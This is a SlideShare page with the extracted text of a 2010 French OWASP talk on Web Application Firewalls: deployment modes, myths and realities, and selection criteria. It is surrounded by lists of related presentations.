SlideShare une entreprise Scribd logo
1  sur  42
RESIST – Toulouse 14 Janvier 2010 Web Application Firewalls (WAF) Sébastien Gioria (French Chapter Leader & OWASP Global Education ComitteeMember)sebastien.gioria@owasp.org Copyright © 2009 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org
Qui suis-je ? Consultant Sécurité au sein du cabinet de commissaires aux comptes Groupe Y (s.gioria@groupey.fr) Président du CLUSIR Poitou-Charentes OWASP France Leader & Evangéliste (sebastien.gioria@owasp.org) ,[object Object]
Différentspostes de manager SSI dans la banque, l’assurance et les télécoms
Expertise Technique
PenTesting, Digital Forensics
S-SDLC
Gestion du risque, Architectures fonctionnelles, Audits
Consulting et Formation en Réseaux et Sécurité
Domaines de prédilection :
Web 4.2 : WebServices, Insécurité du Web.,[object Object]
OWASPenFrance Un Conseild’Administration (Association loi 1901) : ,[object Object],Consultant indépendant en sécurité des systèmesd’informations. Président du CLUSIR Poitou-Charentes  ,[object Object]
Secrétaire et Responsable des aspects Juridiques: Estelle Aimé. AvocateUn Bureau : ,[object Object]
RomainGaucher : Ex-chercheur au NIST, consultant chez Cigital
Mathieu Estrade : DéveloppeurApache.Projets :  ,[object Object]
Guides : en cours.
Questionnaire a destination des RSSI : en cours.
Groupe de travail de la sécurité applicative du CLUSIFInterventions :  ,[object Object]
OSSIR
Microsoft TechDays
PCI-Global
CERT-ISTSensibilisation/ Formations : ,[object Object]
Sociétéd’EDI (JAVA)
OpérateurTéléphonie mobile (PHP/WebServices)
Différents services gouvernementaux
Conférencesdans des écoles
Sociétés du CAC40 (Banque/Aéronautique),[object Object]
% Attaques % Dépenses 75 % 10 % 90 % 25 % Etude du SANS (septembre 2009) http://www.sans.org/top-cyber-security-risks/ Faiblesse des Applications Web Application Web Eléments Réseaux Etude du GARTNER 2003 75% des attaques ciblent le niveau Applicatif 66% des  applications web sont vulnérables "La veille d’un incident, le retour sur investissement d’un système de sécurité est nul. Le lendemain, il est infini." Dennis Hoffman, RSA
 Je suis protégé contre les attaques, j’ai un firewall
Mon site Web est sécurisé puisque il est protégé par SSL
Et arriva le WAF… ,[object Object],In the context of Requirement 6.6, an “application firewall” is a web application firewall (WAF), whichisa securitypolicyenforcement point positionedbetween a web application and the client end point. This functionalitycanbeimplemented in software or hardware, running in an appliancedevice, or in a typical server running a common operating system. It maybe a stand-alonedevice or integratedintoother network components.  http://www.owasp.org/index.php/Web_Application_Firewall ,[object Object],A web application firewall (WAF) is an appliance, server plugin, or filterthatapplies a set of rules to an HTTP conversation. Generally, theserulescovercommonattackssuch as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, manyattackscanbeidentified and blocked. The effort to performthiscustomizationcanbesignificant and needs to bemaintained as the application ismodified.
Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
Mode Parallèle/Sonde
Mode Intrusif/Reverse Proxy
Intégré au serveur Web (mod_security d’Apache)
Intégré au Code/a l’applicatif Disponible dans l’OWASP ESAPI Uniquement ! Se base sur des règles configurables à la volée Proche du code, et peut donc gérer les entrées + sorties.
Choisir son WAF/son camp
Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
Réalités du WAF Patcher virtuellement les problèmes Plus ou moins efficace suivant la méthode employée (positive, négative) Cacher tout ou partie de l’infrastructure  En mode reverse proxy Analyseur de trafic HTTP/HTTPS/XML puissant Grace à ses fonctions de normalisation et son reporting
Mythes du WAF C’est un nouvel élément d’infrastructure  Couts supplémentaires, à intégrer en PCA, … Compétence supplémentaire… Source de problèmes récurrents : Modèle positif : à chaque modification de l’applicatif  Modèle négatif : dépendant des mises a jours. Complexifie le debug Ce n’est pas la solution! Il « laisse » passer des failles (Session Hijacking, élévation de privilèges, HTTP responsesplitting, …) Il n’est pas (encore) obligatoire en PCI-DSS !
Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
WAF – En ai-je besoin ?  Boite Noire Elevé Majoritairement développé en externe, peu de sources disponibles Bénéfice d’un WAF Majoritairement développé en interne, disponibilité des sources Moyen Accès total aux sources, et aux développeurs Faible Aucun Total Partiel Accès aux sources de l’application
Web Application Firewall Evaluation Criteria (WAFEC) Projet du Web Application Security Consortium http://www.webappsec.org/projects/wafec/ Liste les fonctionnalités possibles d’un WAF et non les fonctions minimum nécessaires d’un WAF Permet d’évaluer techniquement le meilleur WAF pour son environnement en fonction de 9 critères : Type d’architecture à déployer (pont, reverse-proxy, intégré, SSL, …) Support d’HTTP et d’HTML (Versions, encodages,…)  Techniques de détection (signatures, techniques de normalisation du trafic, …) Techniques de protection (brute force, cookies, sessions, …) Journalisation (intégration NSM, type de logs, gestion des données sensibles, …) Rapports (types de rapports, distribution, format, …)  Administration (politiques, logs, …)  Performance (nb de connexions/s, latences, …) Support XML (WS-i intégration, validation XML/RPC, …)

Contenu connexe

Tendances

Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesXavier Kress
 
Securite des Applications dans le Cloud
Securite des Applications dans le CloudSecurite des Applications dans le Cloud
Securite des Applications dans le CloudSebastien Gioria
 
Sécurité des applications Web
Sécurité des applications WebSécurité des applications Web
Sécurité des applications WebKlee Group
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le webSofteam agency
 
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014 Securite applicative et SDLC - OWASP Quebec - 15 avril 2014
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014 Patrick Leclerc
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1Tarek MOHAMED
 
Les 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPLes 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPyaboukir
 
Wavestone benchmark securite site web 2016 2017
Wavestone benchmark securite site web 2016 2017Wavestone benchmark securite site web 2016 2017
Wavestone benchmark securite site web 2016 2017Gaudefroy Ariane
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité webdavystoffel
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebCyrille Grandval
 
La Quete du code source fiable et sécurisé - GSDAYS 2015
La Quete du code source fiable et sécurisé - GSDAYS 2015La Quete du code source fiable et sécurisé - GSDAYS 2015
La Quete du code source fiable et sécurisé - GSDAYS 2015Sebastien Gioria
 
Wavestone - IAM of Things / Identité des objets connectés
Wavestone - IAM of Things / Identité des objets connectésWavestone - IAM of Things / Identité des objets connectés
Wavestone - IAM of Things / Identité des objets connectésKévin Guérin
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesBee_Ware
 
Securing your API and mobile application - API Connection FR
Securing your API and mobile application - API Connection FRSecuring your API and mobile application - API Connection FR
Securing your API and mobile application - API Connection FRSebastien Gioria
 
OWASP Mobile Top10 - Les 10 risques sur les mobiles
OWASP Mobile Top10 -  Les 10 risques sur les mobilesOWASP Mobile Top10 -  Les 10 risques sur les mobiles
OWASP Mobile Top10 - Les 10 risques sur les mobilesSébastien GIORIA
 
OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013Sébastien GIORIA
 
Sécurité des applications Web
Sécurité des applications WebSécurité des applications Web
Sécurité des applications WebSylvain Maret
 
Test d’intrusion dans le cadre du cycle de développement (Vumetric)
Test d’intrusion dans le cadre du cycle de développement (Vumetric)Test d’intrusion dans le cadre du cycle de développement (Vumetric)
Test d’intrusion dans le cadre du cycle de développement (Vumetric)Vumetric
 
Vulnérabilité des sites web
Vulnérabilité des sites webVulnérabilité des sites web
Vulnérabilité des sites webSaid Sadik
 

Tendances (20)

Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuelles
 
Securite des Applications dans le Cloud
Securite des Applications dans le CloudSecurite des Applications dans le Cloud
Securite des Applications dans le Cloud
 
Sécurité des applications Web
Sécurité des applications WebSécurité des applications Web
Sécurité des applications Web
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le web
 
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014 Securite applicative et SDLC - OWASP Quebec - 15 avril 2014
Securite applicative et SDLC - OWASP Quebec - 15 avril 2014
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1
 
Les 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPLes 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASP
 
Wavestone benchmark securite site web 2016 2017
Wavestone benchmark securite site web 2016 2017Wavestone benchmark securite site web 2016 2017
Wavestone benchmark securite site web 2016 2017
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité web
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative Web
 
La Quete du code source fiable et sécurisé - GSDAYS 2015
La Quete du code source fiable et sécurisé - GSDAYS 2015La Quete du code source fiable et sécurisé - GSDAYS 2015
La Quete du code source fiable et sécurisé - GSDAYS 2015
 
Wavestone - IAM of Things / Identité des objets connectés
Wavestone - IAM of Things / Identité des objets connectésWavestone - IAM of Things / Identité des objets connectés
Wavestone - IAM of Things / Identité des objets connectés
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuelles
 
Securing your API and mobile application - API Connection FR
Securing your API and mobile application - API Connection FRSecuring your API and mobile application - API Connection FR
Securing your API and mobile application - API Connection FR
 
OWASP Mobile Top10 - Les 10 risques sur les mobiles
OWASP Mobile Top10 -  Les 10 risques sur les mobilesOWASP Mobile Top10 -  Les 10 risques sur les mobiles
OWASP Mobile Top10 - Les 10 risques sur les mobiles
 
OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013
 
Sécurité des applications Web
Sécurité des applications WebSécurité des applications Web
Sécurité des applications Web
 
Test d’intrusion dans le cadre du cycle de développement (Vumetric)
Test d’intrusion dans le cadre du cycle de développement (Vumetric)Test d’intrusion dans le cadre du cycle de développement (Vumetric)
Test d’intrusion dans le cadre du cycle de développement (Vumetric)
 
Vulnérabilité des sites web
Vulnérabilité des sites webVulnérabilité des sites web
Vulnérabilité des sites web
 
ITrust Company Overview FR
ITrust Company Overview FRITrust Company Overview FR
ITrust Company Overview FR
 

En vedette

Techdays 2013 (geek in da house - 2 (salah))
Techdays   2013 (geek in da house - 2 (salah))Techdays   2013 (geek in da house - 2 (salah))
Techdays 2013 (geek in da house - 2 (salah))proteus91
 
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logiciel
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logicielASFWS 2011 : Les exigences PCI-DSS en terme de développement logiciel
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logicielCyber Security Alliance
 
Les francais et la protection des données personnelles
Les francais et la protection des données personnellesLes francais et la protection des données personnelles
Les francais et la protection des données personnellesBee_Ware
 
Les 10 principales menaces de sécurité des bases de données
Les 10 principales menaces de sécurité des bases de donnéesLes 10 principales menaces de sécurité des bases de données
Les 10 principales menaces de sécurité des bases de donnéesImperva
 
Plan de reprise d’activité
Plan de reprise d’activitéPlan de reprise d’activité
Plan de reprise d’activitéExam PM
 
AngularJS - Présentation (french)
AngularJS - Présentation (french)AngularJS - Présentation (french)
AngularJS - Présentation (french)Yacine Rezgui
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Deivid Toledo
 
PRA et PCA : plans de reprise et de continuité d'activité
 PRA et PCA : plans de reprise et de continuité d'activité PRA et PCA : plans de reprise et de continuité d'activité
PRA et PCA : plans de reprise et de continuité d'activitéChristophe Casalegno
 
Presentation des failles_de_securite
Presentation des failles_de_securitePresentation des failles_de_securite
Presentation des failles_de_securiteBorni Dhifi
 
comprendre angularJS en 10 minutes
comprendre angularJS en 10 minutescomprendre angularJS en 10 minutes
comprendre angularJS en 10 minutesDavid Bo
 
Guide Pratique Isolation Logement par ADEME
Guide Pratique Isolation Logement par ADEMEGuide Pratique Isolation Logement par ADEME
Guide Pratique Isolation Logement par ADEMETravauxlib
 
Tutorial Alumnos Socrative
Tutorial  Alumnos SocrativeTutorial  Alumnos Socrative
Tutorial Alumnos SocrativeCintia Gomez
 
PHP et Performances - AFUP 2005
PHP et Performances - AFUP 2005PHP et Performances - AFUP 2005
PHP et Performances - AFUP 2005Eric D.
 
Petits poèmes d´amour
Petits poèmes d´amourPetits poèmes d´amour
Petits poèmes d´amourIsaac TC
 

En vedette (17)

Techdays 2013 (geek in da house - 2 (salah))
Techdays   2013 (geek in da house - 2 (salah))Techdays   2013 (geek in da house - 2 (salah))
Techdays 2013 (geek in da house - 2 (salah))
 
Apache Open SSL
Apache Open SSLApache Open SSL
Apache Open SSL
 
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logiciel
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logicielASFWS 2011 : Les exigences PCI-DSS en terme de développement logiciel
ASFWS 2011 : Les exigences PCI-DSS en terme de développement logiciel
 
Les francais et la protection des données personnelles
Les francais et la protection des données personnellesLes francais et la protection des données personnelles
Les francais et la protection des données personnelles
 
Les 10 principales menaces de sécurité des bases de données
Les 10 principales menaces de sécurité des bases de donnéesLes 10 principales menaces de sécurité des bases de données
Les 10 principales menaces de sécurité des bases de données
 
Plan de reprise d’activité
Plan de reprise d’activitéPlan de reprise d’activité
Plan de reprise d’activité
 
AngularJS - Présentation (french)
AngularJS - Présentation (french)AngularJS - Présentation (french)
AngularJS - Présentation (french)
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 
PRA et PCA : plans de reprise et de continuité d'activité
 PRA et PCA : plans de reprise et de continuité d'activité PRA et PCA : plans de reprise et de continuité d'activité
PRA et PCA : plans de reprise et de continuité d'activité
 
Presentation des failles_de_securite
Presentation des failles_de_securitePresentation des failles_de_securite
Presentation des failles_de_securite
 
comprendre angularJS en 10 minutes
comprendre angularJS en 10 minutescomprendre angularJS en 10 minutes
comprendre angularJS en 10 minutes
 
Guide Pratique Isolation Logement par ADEME
Guide Pratique Isolation Logement par ADEMEGuide Pratique Isolation Logement par ADEME
Guide Pratique Isolation Logement par ADEME
 
Tutorial Alumnos Socrative
Tutorial  Alumnos SocrativeTutorial  Alumnos Socrative
Tutorial Alumnos Socrative
 
PHP et Performances - AFUP 2005
PHP et Performances - AFUP 2005PHP et Performances - AFUP 2005
PHP et Performances - AFUP 2005
 
Petits poèmes d´amour
Petits poèmes d´amourPetits poèmes d´amour
Petits poèmes d´amour
 
Chile
ChileChile
Chile
 
Vida nueva en el espiritu
Vida nueva en el espirituVida nueva en el espiritu
Vida nueva en el espiritu
 

Similaire à 20100114 Waf V0.7

2010 03-10-web applications firewalls v 0.8
2010 03-10-web applications firewalls v 0.82010 03-10-web applications firewalls v 0.8
2010 03-10-web applications firewalls v 0.8Sébastien GIORIA
 
mise en pratique de l'outil Skipfish
mise en pratique de l'outil Skipfishmise en pratique de l'outil Skipfish
mise en pratique de l'outil SkipfishMounia EL
 
2010 02 09 Ms Tech Days Owasp Asvs Sgi V01
2010 02 09 Ms Tech Days Owasp Asvs Sgi V012010 02 09 Ms Tech Days Owasp Asvs Sgi V01
2010 02 09 Ms Tech Days Owasp Asvs Sgi V01Sébastien GIORIA
 
Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internetwaggaland
 
Barracuda Networks
Barracuda NetworksBarracuda Networks
Barracuda NetworksiTProFR
 
Actions prioritaires pour la SSI
Actions prioritaires pour la SSI Actions prioritaires pour la SSI
Actions prioritaires pour la SSI Johan Moreau
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Hamza Ben Marzouk
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTCyber Security Alliance
 
[GAB2016] NodeJS dans Azure - Matthieu Bouilloux
[GAB2016] NodeJS dans Azure - Matthieu Bouilloux[GAB2016] NodeJS dans Azure - Matthieu Bouilloux
[GAB2016] NodeJS dans Azure - Matthieu BouillouxCellenza
 
Matthieu Bouilloux - NodeJS dans Azure - - Global Azure Bootcamp 2016 Paris
Matthieu Bouilloux - NodeJS dans Azure -  - Global Azure Bootcamp 2016 ParisMatthieu Bouilloux - NodeJS dans Azure -  - Global Azure Bootcamp 2016 Paris
Matthieu Bouilloux - NodeJS dans Azure - - Global Azure Bootcamp 2016 ParisAZUG FR
 
Alphorm.com Formation Pentesting avec Metasploit
Alphorm.com Formation Pentesting avec MetasploitAlphorm.com Formation Pentesting avec Metasploit
Alphorm.com Formation Pentesting avec MetasploitAlphorm
 
SESEN_Atilgan_fr_20150511
SESEN_Atilgan_fr_20150511SESEN_Atilgan_fr_20150511
SESEN_Atilgan_fr_20150511Atilgan Sesen
 
CV Saddam ZEMMALI Professionel Fr
CV Saddam ZEMMALI Professionel FrCV Saddam ZEMMALI Professionel Fr
CV Saddam ZEMMALI Professionel FrSaddam ZEMMALI ☁
 
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliances
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliancesWe620 g formation-administration-de-ibm-websphere-datapower-soa-appliances
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliancesCERTyou Formation
 
Epitech securite-2012.key
Epitech securite-2012.keyEpitech securite-2012.key
Epitech securite-2012.keyDamien Seguy
 
Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Asma Messaoudi
 

Similaire à 20100114 Waf V0.7 (20)

2010 03-10-web applications firewalls v 0.8
2010 03-10-web applications firewalls v 0.82010 03-10-web applications firewalls v 0.8
2010 03-10-web applications firewalls v 0.8
 
OW2 JASMINe
OW2 JASMINeOW2 JASMINe
OW2 JASMINe
 
Cdt juin2011 21
Cdt juin2011 21Cdt juin2011 21
Cdt juin2011 21
 
mise en pratique de l'outil Skipfish
mise en pratique de l'outil Skipfishmise en pratique de l'outil Skipfish
mise en pratique de l'outil Skipfish
 
2010 02 09 Ms Tech Days Owasp Asvs Sgi V01
2010 02 09 Ms Tech Days Owasp Asvs Sgi V012010 02 09 Ms Tech Days Owasp Asvs Sgi V01
2010 02 09 Ms Tech Days Owasp Asvs Sgi V01
 
Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internet
 
Barracuda Networks
Barracuda NetworksBarracuda Networks
Barracuda Networks
 
Actions prioritaires pour la SSI
Actions prioritaires pour la SSI Actions prioritaires pour la SSI
Actions prioritaires pour la SSI
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015
 
rapportWAS
rapportWASrapportWAS
rapportWAS
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APTASFWS 2011 - L’importance du protocole HTTP dans la menace APT
ASFWS 2011 - L’importance du protocole HTTP dans la menace APT
 
[GAB2016] NodeJS dans Azure - Matthieu Bouilloux
[GAB2016] NodeJS dans Azure - Matthieu Bouilloux[GAB2016] NodeJS dans Azure - Matthieu Bouilloux
[GAB2016] NodeJS dans Azure - Matthieu Bouilloux
 
Matthieu Bouilloux - NodeJS dans Azure - - Global Azure Bootcamp 2016 Paris
Matthieu Bouilloux - NodeJS dans Azure -  - Global Azure Bootcamp 2016 ParisMatthieu Bouilloux - NodeJS dans Azure -  - Global Azure Bootcamp 2016 Paris
Matthieu Bouilloux - NodeJS dans Azure - - Global Azure Bootcamp 2016 Paris
 
Alphorm.com Formation Pentesting avec Metasploit
Alphorm.com Formation Pentesting avec MetasploitAlphorm.com Formation Pentesting avec Metasploit
Alphorm.com Formation Pentesting avec Metasploit
 
SESEN_Atilgan_fr_20150511
SESEN_Atilgan_fr_20150511SESEN_Atilgan_fr_20150511
SESEN_Atilgan_fr_20150511
 
CV Saddam ZEMMALI Professionel Fr
CV Saddam ZEMMALI Professionel FrCV Saddam ZEMMALI Professionel Fr
CV Saddam ZEMMALI Professionel Fr
 
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliances
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliancesWe620 g formation-administration-de-ibm-websphere-datapower-soa-appliances
We620 g formation-administration-de-ibm-websphere-datapower-soa-appliances
 
Epitech securite-2012.key
Epitech securite-2012.keyEpitech securite-2012.key
Epitech securite-2012.key
 
Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02
 

Plus de Sébastien GIORIA

OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014Sébastien GIORIA
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceSébastien GIORIA
 
2014 09-25-club-27001 iso 27034-presentation-v2.2
2014 09-25-club-27001 iso 27034-presentation-v2.22014 09-25-club-27001 iso 27034-presentation-v2.2
2014 09-25-club-27001 iso 27034-presentation-v2.2Sébastien GIORIA
 
2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pchSébastien GIORIA
 
OWASP, the life and the universe
OWASP, the life and the universeOWASP, the life and the universe
OWASP, the life and the universeSébastien GIORIA
 
2013 04-04-html5-security-v2
2013 04-04-html5-security-v22013 04-04-html5-security-v2
2013 04-04-html5-security-v2Sébastien GIORIA
 
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)Sébastien GIORIA
 
2013 03-01 automatiser les tests sécurité
2013 03-01 automatiser les tests sécurité2013 03-01 automatiser les tests sécurité
2013 03-01 automatiser les tests sécuritéSébastien GIORIA
 
2013 02-27-owasp top10 javascript
 2013 02-27-owasp top10 javascript 2013 02-27-owasp top10 javascript
2013 02-27-owasp top10 javascriptSébastien GIORIA
 
2012 11-07-owasp mobile top10 v01
2012 11-07-owasp mobile top10 v012012 11-07-owasp mobile top10 v01
2012 11-07-owasp mobile top10 v01Sébastien GIORIA
 
2011 02-07-html5-security-v1
2011 02-07-html5-security-v12011 02-07-html5-security-v1
2011 02-07-html5-security-v1Sébastien GIORIA
 
2011 02-08-ms tech-days-sdl-sgi-v02
2011 02-08-ms tech-days-sdl-sgi-v022011 02-08-ms tech-days-sdl-sgi-v02
2011 02-08-ms tech-days-sdl-sgi-v02Sébastien GIORIA
 

Plus de Sébastien GIORIA (20)

OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSource
 
2014 09-25-club-27001 iso 27034-presentation-v2.2
2014 09-25-club-27001 iso 27034-presentation-v2.22014 09-25-club-27001 iso 27034-presentation-v2.2
2014 09-25-club-27001 iso 27034-presentation-v2.2
 
SonarQube et la Sécurité
SonarQube et la SécuritéSonarQube et la Sécurité
SonarQube et la Sécurité
 
2014 09-04-pj
2014 09-04-pj2014 09-04-pj
2014 09-04-pj
 
Présentation au CRI-Ouest
Présentation au CRI-OuestPrésentation au CRI-Ouest
Présentation au CRI-Ouest
 
2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch
 
OWASP, the life and the universe
OWASP, the life and the universeOWASP, the life and the universe
OWASP, the life and the universe
 
2013 04-04-html5-security-v2
2013 04-04-html5-security-v22013 04-04-html5-security-v2
2013 04-04-html5-security-v2
 
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
 
2013 03-01 automatiser les tests sécurité
2013 03-01 automatiser les tests sécurité2013 03-01 automatiser les tests sécurité
2013 03-01 automatiser les tests sécurité
 
2013 02-27-owasp top10 javascript
 2013 02-27-owasp top10 javascript 2013 02-27-owasp top10 javascript
2013 02-27-owasp top10 javascript
 
Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for Java
 
2012 11-07-owasp mobile top10 v01
2012 11-07-owasp mobile top10 v012012 11-07-owasp mobile top10 v01
2012 11-07-owasp mobile top10 v01
 
2012 07-05-spn-sgi-v1-lite
2012 07-05-spn-sgi-v1-lite2012 07-05-spn-sgi-v1-lite
2012 07-05-spn-sgi-v1-lite
 
2012 03-02-sdl-sgi-v03
2012 03-02-sdl-sgi-v032012 03-02-sdl-sgi-v03
2012 03-02-sdl-sgi-v03
 
2012 03-01-ror security v01
2012 03-01-ror security v012012 03-01-ror security v01
2012 03-01-ror security v01
 
2011 02-07-html5-security-v1
2011 02-07-html5-security-v12011 02-07-html5-security-v1
2011 02-07-html5-security-v1
 
2011 03-09-cloud sgi
2011 03-09-cloud sgi2011 03-09-cloud sgi
2011 03-09-cloud sgi
 
2011 02-08-ms tech-days-sdl-sgi-v02
2011 02-08-ms tech-days-sdl-sgi-v022011 02-08-ms tech-days-sdl-sgi-v02
2011 02-08-ms tech-days-sdl-sgi-v02
 

20100114 Waf V0.7

  • 1. RESIST – Toulouse 14 Janvier 2010 Web Application Firewalls (WAF) Sébastien Gioria (French Chapter Leader & OWASP Global Education ComitteeMember)sebastien.gioria@owasp.org Copyright © 2009 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org
  • 2.
  • 3. Différentspostes de manager SSI dans la banque, l’assurance et les télécoms
  • 7. Gestion du risque, Architectures fonctionnelles, Audits
  • 8. Consulting et Formation en Réseaux et Sécurité
  • 10.
  • 11.
  • 12.
  • 13. RomainGaucher : Ex-chercheur au NIST, consultant chez Cigital
  • 14.
  • 15. Guides : en cours.
  • 16. Questionnaire a destination des RSSI : en cours.
  • 17.
  • 18. OSSIR
  • 21.
  • 26.
  • 27. % Attaques % Dépenses 75 % 10 % 90 % 25 % Etude du SANS (septembre 2009) http://www.sans.org/top-cyber-security-risks/ Faiblesse des Applications Web Application Web Eléments Réseaux Etude du GARTNER 2003 75% des attaques ciblent le niveau Applicatif 66% des applications web sont vulnérables "La veille d’un incident, le retour sur investissement d’un système de sécurité est nul. Le lendemain, il est infini." Dennis Hoffman, RSA
  • 28.  Je suis protégé contre les attaques, j’ai un firewall
  • 29. Mon site Web est sécurisé puisque il est protégé par SSL
  • 30.
  • 31. Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
  • 34. Intégré au serveur Web (mod_security d’Apache)
  • 35. Intégré au Code/a l’applicatif Disponible dans l’OWASP ESAPI Uniquement ! Se base sur des règles configurables à la volée Proche du code, et peut donc gérer les entrées + sorties.
  • 37. Agenda L’OWASP Web Application Firewalls (WAF) Choisir son WAF WAF Mythes et réalités WAF mode d’emploi S’amuser avec son WAF Et après ?
